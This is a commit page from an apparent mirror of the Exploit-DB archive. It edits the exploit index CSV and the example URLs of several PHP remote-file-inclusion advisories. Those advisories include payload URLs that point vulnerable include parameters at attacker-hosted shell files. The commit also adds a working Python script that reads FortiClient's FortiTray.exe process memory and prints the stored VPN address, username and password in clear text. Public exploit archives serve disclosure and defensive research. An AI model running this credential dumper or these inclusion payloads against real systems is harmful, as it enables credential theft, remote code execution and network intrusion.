bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-09-02

Browse source 
2 new exploits

SAPID Blog beta 2 - (root_path) Remote File Inclusion
SAPID Gallery 1.0 - (root_path) Remote File Inclusion
SAPID Shop 1.2 - (root_path) Remote File Inclusion
SAPID Blog beta 2 - (root_path) Remote File Inclusion
SAPID Gallery 1.0 - (root_path) Remote File Inclusion
SAPID Shop 1.2 - (root_path) Remote File Inclusion

PHPCodeCabinet 0.5 - (Core.php) Remote File Inclusion

phNNTP 1.3 - (article-raw.php) Remote File Inclusion
Cwfm 0.9.1 - (Language) Remote File Inclusion
PHP 4.4.3 / 5.1.4 - (objIndex) Local Buffer Overflow PoC
Cwfm 0.9.1 - (Language) Remote File Inclusion
PHP 4.4.3 / 5.1.4 - (objIndex) Local Buffer Overflow PoC

PgMarket 2.2.3 - (CFG[libdir]) Remote File Inclusion

PHPMyRing 4.2.0 - (view_com.php) SQL Injection

SAPID CMS 1.2.3_rc3 - (rootpath) Remote Code Execution Exploit

phpwcms 1.1-RC4 - (spaw) Remote File Inclusion
Spaminator 1.7 - (page) Remote File Inclusion
Thatware 0.4.6 - (root_path) Remote File Inclusion
Spaminator 1.7 - (page) Remote File Inclusion
Thatware 0.4.6 - (root_path) Remote File Inclusion

phpPrintAnalyzer 1.2 - Remote File Inclusion

Wheatblog 1.1 - (session.php) Remote File Inclusion

phPay 2.02 - (nu_mail.inc.php) Remote mail() Injection Exploit

WordPress CYSTEME Finder Plugin 1.3 - Arbitrary File Dislcosure/Arbitrary File Upload
WordPress CYSTEME Finder Plugin 1.3 - Arbitrary File Disclosure/Arbitrary File Upload

FortiClient SSLVPN 5.4 - Credentials Disclosure
This commit is contained in:
Offensive Security 2016-09-02 05:08:35 +00:00
parent 3a2154afbd
commit f96ddba143
10 changed files with 80 additions and 24 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

35
files.csv
View file

@ -1824,9 +1824,9 @@ id,file,description,date,author,platform,type,port
2125,platforms/php/webapps/2125.txt,"Joomla JD-Wiki Component 1.0.2 - Remote File Inclusion",2006-08-07,jank0,php,webapps,0
2127,platforms/php/webapps/2127.txt,"Modernbill 1.6 - (config.php) Remote File Inclusion",2006-08-07,Solpot,php,webapps,0
2128,platforms/php/webapps/2128.txt,"SAPID CMS 1.2.3.05 - (root_path) Remote File Inclusion",2006-08-07,Kacper,php,webapps,0
2129,platforms/php/webapps/2129.txt,"SAPID Blog beta 2 - (root_path) Remote File Inclusion",2006-08-07,Kacper,php,webapps,0
2130,platforms/php/webapps/2130.txt,"SAPID Gallery 1.0 - (root_path) Remote File Inclusion",2006-08-07,Kacper,php,webapps,0
2131,platforms/php/webapps/2131.txt,"SAPID Shop 1.2 - (root_path) Remote File Inclusion",2006-08-07,Kacper,php,webapps,0
2129,platforms/php/webapps/2129.txt,"SAPID Blog beta 2 - (root_path) Remote File Inclusion",2006-08-07,Kacper,php,webapps,80
2130,platforms/php/webapps/2130.txt,"SAPID Gallery 1.0 - (root_path) Remote File Inclusion",2006-08-07,Kacper,php,webapps,80
2131,platforms/php/webapps/2131.txt,"SAPID Shop 1.2 - (root_path) Remote File Inclusion",2006-08-07,Kacper,php,webapps,80
2132,platforms/php/webapps/2132.txt,"phpAutoMembersArea 3.2.5 - (installed_config_file) Remote File Inclusion",2006-08-07,"Philipp Niedziela",php,webapps,0
2133,platforms/php/webapps/2133.txt,"Simple CMS - Administrator Authentication Bypass",2006-08-07,daaan,php,webapps,0
2134,platforms/php/webapps/2134.txt,"phpCC 4.2 beta - (base_dir) Remote File Inclusion",2006-08-07,Solpot,php,webapps,0
@ -1834,7 +1834,7 @@ id,file,description,date,author,platform,type,port
2136,platforms/hardware/remote/2136.txt,"Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution",2006-08-07,"Greg Sinclair",hardware,remote,0
2137,platforms/php/webapps/2137.txt,"QuestCMS - 'main.php' Remote File Inclusion",2006-08-07,Crackers_Child,php,webapps,0
2138,platforms/asp/webapps/2138.txt,"YenerTurk Haber Script 1.0 - SQL Injection",2006-08-07,ASIANEAGLE,asp,webapps,0
2139,platforms/php/webapps/2139.txt,"PHPCodeCabinet 0.5 - (Core.php) Remote File Inclusion",2006-08-07,Minion,php,webapps,0
2139,platforms/php/webapps/2139.txt,"PHPCodeCabinet 0.5 - (Core.php) Remote File Inclusion",2006-08-07,Minion,php,webapps,80
2140,platforms/windows/remote/2140.pm,"eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (2)",2006-08-07,ri0t,windows,remote,10616
2141,platforms/php/webapps/2141.txt,"Visual Events Calendar 1.1 - (cfg_dir) Remote File Inclusion",2006-08-07,"Mehmet Ince",php,webapps,0
2142,platforms/php/webapps/2142.txt,"ZoneX 1.0.3 - Publishers Gold Edition Remote File Inclusion",2006-08-07,"Mehmet Ince",php,webapps,0
@ -1843,40 +1843,40 @@ id,file,description,date,author,platform,type,port
2145,platforms/hardware/remote/2145.txt,"Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution (extra)",2006-08-08,PATz,hardware,remote,0
2146,platforms/php/webapps/2146.txt,"docpile:we 0.2.2 - (INIT_PATH) Remote File Inclusion",2006-08-08,"Mehmet Ince",php,webapps,0
2147,platforms/windows/dos/2147.pl,"XChat 2.6.7 - (Windows) Remote Denial of Service (Perl)",2006-08-08,Elo,windows,dos,0
2148,platforms/php/webapps/2148.txt,"phNNTP 1.3 - (article-raw.php) Remote File Inclusion",2006-08-08,Drago84,php,webapps,0
2148,platforms/php/webapps/2148.txt,"phNNTP 1.3 - (article-raw.php) Remote File Inclusion",2006-08-08,Drago84,php,webapps,80
2149,platforms/php/webapps/2149.txt,"Hitweb 4.2.1 - (REP_INC) Remote File Inclusion",2006-08-08,Drago84,php,webapps,0
2150,platforms/asp/webapps/2150.txt,"CLUB-Nuke [XP] 2.0 LCID 2048 (Turkish Version) - SQL Injection",2006-08-08,ASIANEAGLE,asp,webapps,0
2151,platforms/php/webapps/2151.txt,"Cwfm 0.9.1 - (Language) Remote File Inclusion",2006-08-08,"Philipp Niedziela",php,webapps,0
2152,platforms/php/webapps/2152.php,"PHP 4.4.3 / 5.1.4 - (objIndex) Local Buffer Overflow PoC",2006-08-08,Heintz,php,webapps,0
2151,platforms/php/webapps/2151.txt,"Cwfm 0.9.1 - (Language) Remote File Inclusion",2006-08-08,"Philipp Niedziela",php,webapps,80
2152,platforms/php/local/2152.php,"PHP 4.4.3 / 5.1.4 - (objIndex) Local Buffer Overflow PoC",2006-08-08,Heintz,php,local,0
2153,platforms/php/webapps/2153.txt,"Boite de News 4.0.1 - 'index.php' Remote File Inclusion",2006-08-09,"the master",php,webapps,0
2154,platforms/php/webapps/2154.txt,"PgMarket 2.2.3 - (CFG[libdir]) Remote File Inclusion",2006-08-09,"Mehmet Ince",php,webapps,0
2154,platforms/php/webapps/2154.txt,"PgMarket 2.2.3 - (CFG[libdir]) Remote File Inclusion",2006-08-09,"Mehmet Ince",php,webapps,80
2155,platforms/php/webapps/2155.txt,"See-Commerce 1.0.625 - (owimg.php3) Remote File Inclusion",2006-08-09,Drago84,php,webapps,0
2156,platforms/hardware/dos/2156.c,"PocketPC Mms Composer - (WAPPush) Denial of Service",2006-08-09,"Collin Mulliner",hardware,dos,0
2157,platforms/php/webapps/2157.txt,"Tagger Luxury Edition - (BBCodeFile) Remote File Inclusion",2006-08-09,Morgan,php,webapps,0
2158,platforms/php/webapps/2158.txt,"TinyWebGallery 1.5 - (image) Remote File Inclusion",2006-08-09,"Mehmet Ince",php,webapps,0
2159,platforms/php/webapps/2159.pl,"PHPMyRing 4.2.0 - (view_com.php) SQL Injection",2006-08-09,simo64,php,webapps,0
2159,platforms/php/webapps/2159.pl,"PHPMyRing 4.2.0 - (view_com.php) SQL Injection",2006-08-09,simo64,php,webapps,80
2160,platforms/windows/dos/2160.c,"OpenMPT 1.17.02.43 - Multiple Remote Buffer Overflow PoC",2006-08-10,"Luigi Auriemma",windows,dos,0
2161,platforms/php/webapps/2161.pl,"SAPID CMS 1.2.3_rc3 - (rootpath) Remote Code Execution Exploit",2006-08-10,simo64,php,webapps,0
2161,platforms/php/webapps/2161.pl,"SAPID CMS 1.2.3_rc3 - (rootpath) Remote Code Execution Exploit",2006-08-10,simo64,php,webapps,80
2162,platforms/windows/remote/2162.pm,"Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)",2006-08-10,"H D Moore",windows,remote,445
2163,platforms/php/webapps/2163.txt,"phpwcms 1.1-RC4 - (spaw) Remote File Inclusion",2006-08-10,Morgan,php,webapps,0
2163,platforms/php/webapps/2163.txt,"phpwcms 1.1-RC4 - (spaw) Remote File Inclusion",2006-08-10,Morgan,php,webapps,80
2164,platforms/windows/remote/2164.pm,"Microsoft Internet Explorer - (MDAC) Remote Code Execution Exploit (MS06-014) (Metasploit) (2)",2006-08-10,"H D Moore",windows,remote,0
2165,platforms/php/webapps/2165.txt,"Spaminator 1.7 - (page) Remote File Inclusion",2006-08-10,Drago84,php,webapps,0
2166,platforms/php/webapps/2166.txt,"Thatware 0.4.6 - (root_path) Remote File Inclusion",2006-08-10,Drago84,php,webapps,0
2165,platforms/php/webapps/2165.txt,"Spaminator 1.7 - (page) Remote File Inclusion",2006-08-10,Drago84,php,webapps,80
2166,platforms/php/webapps/2166.txt,"Thatware 0.4.6 - (root_path) Remote File Inclusion",2006-08-10,Drago84,php,webapps,80
2167,platforms/php/webapps/2167.txt,"SaveWebPortal 3.4 - (page) Remote File Inclusion",2006-08-10,Bl0od3r,php,webapps,0
2168,platforms/php/webapps/2168.txt,"phpPrintAnalyzer 1.2 - Remote File Inclusion",2006-08-10,Cmaster4,php,webapps,0
2168,platforms/php/webapps/2168.txt,"phpPrintAnalyzer 1.2 - Remote File Inclusion",2006-08-10,Cmaster4,php,webapps,80
2169,platforms/php/webapps/2169.txt,"Chaussette 080706 - (_BASE) Remote File Inclusion",2006-08-10,Drago84,php,webapps,0
2170,platforms/php/webapps/2170.txt,"VWar 1.50 R14 - (online.php) SQL Injection",2006-08-10,brOmstar,php,webapps,0
2171,platforms/php/webapps/2171.txt,"WEBInsta MM 1.3e - (cabsolute_path) Remote File Inclusion",2006-08-10,"Philipp Niedziela",php,webapps,0
2172,platforms/php/webapps/2172.txt,"Mambo Remository Component 3.25 - Remote File Inclusion",2006-08-10,camino,php,webapps,0
2173,platforms/php/webapps/2173.txt,"MVCnPHP 3.0 - glConf[path_libraries] Remote File Inclusion",2006-08-10,Drago84,php,webapps,0
2174,platforms/php/webapps/2174.txt,"Wheatblog 1.1 - (session.php) Remote File Inclusion",2006-08-11,O.U.T.L.A.W,php,webapps,0
2174,platforms/php/webapps/2174.txt,"Wheatblog 1.1 - (session.php) Remote File Inclusion",2006-08-11,O.U.T.L.A.W,php,webapps,80
2175,platforms/php/webapps/2175.txt,"WEBinsta CMS 0.3.1 - (templates_dir) Remote File Inclusion Exploit",2006-08-12,K-159,php,webapps,0
2176,platforms/hardware/dos/2176.html,"Nokia Symbian 60 3rd Edition - Browser Denial of Service Crash",2006-08-13,Qode,hardware,dos,0
2177,platforms/php/webapps/2177.txt,"Joomla Webring Component 1.0 - Remote File Inclusion",2006-08-13,"Mehmet Ince",php,webapps,0
2178,platforms/php/webapps/2178.php,"XMB 1.9.6 Final - basename() Remote Command Execution Exploit",2006-08-13,rgod,php,webapps,0
2179,platforms/multiple/dos/2179.c,"Opera 9 - IRC Client Remote Denial of Service",2006-08-13,Preddy,multiple,dos,0
2180,platforms/multiple/dos/2180.py,"Opera 9 IRC Client - Remote Denial of Service (Python)",2006-08-13,Preddy,multiple,dos,0
2181,platforms/php/webapps/2181.pl,"phPay 2.02 - (nu_mail.inc.php) Remote mail() Injection Exploit",2006-08-14,beford,php,webapps,0
2181,platforms/php/webapps/2181.pl,"phPay 2.02 - (nu_mail.inc.php) Remote mail() Injection Exploit",2006-08-14,beford,php,webapps,80
2182,platforms/php/webapps/2182.txt,"Mambo mmp Component 1.2 - Remote File Inclusion",2006-08-14,mdx,php,webapps,0
2183,platforms/php/webapps/2183.txt,"ProjectButler 0.8.4 - (rootdir) Remote File Inclusion",2006-08-14,"the master",php,webapps,0
2184,platforms/php/webapps/2184.txt,"Mambo Peoplebook Component 1.0 - Remote File Inclusion",2006-08-14,Matdhule,php,webapps,0
@ -36439,7 +36439,7 @@ id,file,description,date,author,platform,type,port
40293,platforms/php/webapps/40293.txt,"chatNow - Multiple Vulnerabilities",2016-08-23,HaHwul,php,webapps,80
40294,platforms/php/remote/40294.rb,"Phoenix Exploit Kit - Remote Code Execution (Metasploit)",2016-08-23,Metasploit,php,remote,80
40309,platforms/multiple/dos/40309.txt,"Adobe Flash - Use-After-Free When Returning Rectangle",2016-08-29,"Google Security Research",multiple,dos,0
40295,platforms/php/webapps/40295.txt,"WordPress CYSTEME Finder Plugin 1.3 - Arbitrary File Dislcosure/Arbitrary File Upload",2016-08-24,T0w3ntum,php,webapps,80
40295,platforms/php/webapps/40295.txt,"WordPress CYSTEME Finder Plugin 1.3 - Arbitrary File Disclosure/Arbitrary File Upload",2016-08-24,T0w3ntum,php,webapps,80
40311,platforms/multiple/dos/40311.txt,"Adobe Flash - MovieClip Transform Getter Use-After-Free",2016-08-29,"Google Security Research",multiple,dos,0
40312,platforms/php/webapps/40312.txt,"FreePBX 13.0.35 - SQL Injection",2016-08-29,i-Hmx,php,webapps,0
40313,platforms/php/dos/40313.php,"PHP 5.0.0 - imap_mail() Local Denial of Service",2016-08-30,"Yakir Wizman",php,dos,0
@ -36459,3 +36459,4 @@ id,file,description,date,author,platform,type,port
40327,platforms/jsp/webapps/40327.txt,"ZKTeco ZKBioSecurity 3.0 - (visLogin.jsp) Local Authorization Bypass",2016-08-31,LiquidWorm,jsp,webapps,0
40328,platforms/jsp/webapps/40328.html,"ZKTeco ZKAccess Security System 5.3.1 - Persistent Cross-Site Scripting",2016-08-31,LiquidWorm,jsp,webapps,8088
40329,platforms/php/dos/40329.php,"PHP 7.0 - JsonSerializable::jsonSerialize json_encode Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
40330,platforms/windows/local/40330.py,"FortiClient SSLVPN 5.4 - Credentials Disclosure",2016-09-01,"Viktor Minin",windows,local,0

Can't render this file because it is too large.

0
platforms/php/webapps/2152.php → platforms/php/local/2152.php
View file

2
platforms/php/webapps/2148.txt
View file

@ -17,7 +17,7 @@ Path:
Declare file_newsportal
ExP:
http://www.site.com/Dir_phNNTP/article-raw.php?file_newsportal=http://www.evalsite.com/shell.php?
http://server/Dir_phNNTP/article-raw.php?file_newsportal=http://www.evalsite.com/shell.php?
Greatz: Str0ke

2
platforms/php/webapps/2154.txt
View file

@ -29,7 +29,7 @@ include ($CFG["libdir"] . "stdlib.inc.php");
####################################################
Exploit:
http://www.site.com/[path]/common.inc.php?CFG[libdir]=http://evil_scripts?
http://server/[path]/common.inc.php?CFG[libdir]=http://evil_scripts?
####################################################

2
platforms/php/webapps/2163.txt
View file

@ -23,7 +23,7 @@ include/inc_ext/spaw/dialogs/td.php
Vendor Website: http://www.phpwcms.de/
PoC:
http://victim-site/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://ehmorgan.net/shell.dat?
http://server/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://ehmorgan.net/shell.dat?
Google Dork:

2
platforms/php/webapps/2165.txt
View file

@ -15,7 +15,7 @@ Path :
Declare $page
ExpL:
http://www.site.com/dir_spaminator/src/Login.php?page=http://www.evalsite.com/shell.php?
http://server/dir_spaminator/src/Login.php?page=http://www.evalsite.com/shell.php?
Greatz:str0ke

2
platforms/php/webapps/2166.txt
View file

@ -11,7 +11,7 @@ Page Affect
config.php
ExP:
http://www.sito.com/dir_thatware/config.php?root_path=http://www.evalsite.com/shell.php'
http://server/dir_thatware/config.php?root_path=http://server/shell.php'
Greatz: str0ke

2
platforms/php/webapps/2168.txt
View file

@ -9,7 +9,7 @@
#cont@ct: gaul@enet.com.cn
#Exploit:
http://site.com/[path]/inc/header.inc.php?ficStyle=[evilcode]
http://server/[path]/inc/header.inc.php?ficStyle=[evilcode]
Thx to :
#batamhacker crew on dal.net h4ntu, havincaz, baylaw and all indonesian underground hacker

2
platforms/php/webapps/2174.txt
View file

@ -34,7 +34,7 @@ function Start_Session()
***********************************************************************
Proof of Concept:
www.site.com/includes/session.php?wb_class_dir=SHELL
server/includes/session.php?wb_class_dir=SHELL
Contact : Outlaw@aria-security.net

55
platforms/windows/local/40330.py Executable file
View file

@ -0,0 +1,55 @@
'''
Title : Extracting clear text passwords from running processes(FortiClient)
CVE-ID : none
Product : FortiClient SSLVPN
Service : FortiTray.exe
Affected : <=5.4
Impact : Critical
Remote : No
Website link : http://forticlient.com/
Reported : 31/08/2016
Authors : Viktor Minin https://1-33-7.com
Alexander Korznikov http://korznikov.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
In our research which involved this program we found that this process store the credentials that you supplied for connecting, in clear text in the process memory.
In this situation a potential attacker who hacked your system can reveal your Username and Password steal and use them.
This may assist him in gaining persistence access to your Organization LAN network.
'''
from winappdbg import Debug, Process, HexDump
import sys
filename = "FortiTray.exe" # Process name
search_string = "fortissl" # pattern to get offset when the credentials stored
# Searching function
def memory_search( pid, strings ):
process = Process( pid )
mem_dump = []
######
# You could also use process.search_regexp to use regular expressions,
# or process.search_text for Unicode strings,
# or process.search_hexa for raw bytes represented in hex.
######
for address in process.search_bytes( strings ):
dump = process.read(address-10,800) #Dump 810 bytes from process memory
mem_dump.append(dump)
for i in mem_dump:
if "FortiClient SSLVPN offline" in i: #print all founds results by offsets to the screen.
print "\n"
print " [+] Address and port to connect: " + str(i[136:180])
print " [+] UserName: " + str(i[677:685])
print " [+] Password: " + str(i[705:715])
print "\n"
debug = Debug()
try:
# Lookup the currently running processes.
debug.system.scan_processes()
# Look for all processes that match the requested filename...
for ( process, name ) in debug.system.find_processes_by_filename( filename ):
pid = process.get_pid()
memory_search(pid,search_string)
finally:
debug.stop()